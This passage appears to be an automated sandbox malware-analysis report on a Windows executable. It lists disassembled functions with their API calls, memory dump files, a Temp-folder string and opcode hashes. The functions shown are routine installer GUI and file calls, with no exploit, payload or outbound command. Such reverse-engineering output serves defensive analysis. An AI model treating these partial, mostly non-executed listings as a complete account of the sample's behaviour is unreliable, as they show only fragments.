                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00403B12 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                • Opcode ID: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                                                                                                                                                                                                                                • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 00404F06 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                                                                                                                                                                • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                • String ID: $M$N
                                                                                                                                                                                                                                • API String ID: 2564846305-813528018
                                                                                                                                                                                                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404738
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404876
                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Stuffiness7.dat, xrefs: 00404835
                                                                                                                                                                                                                                • N, xrefs: 004047F4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$N
                                                                                                                                                                                                                                • API String ID: 3103080414-2890022275
                                                                                                                                                                                                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0040498A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                                                                                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,0042D268,00000000,?,?), ref: 00404AF1
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat), ref: 00404AFD
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                                                                                                                                                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                                                                                                                                                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmpDownload File
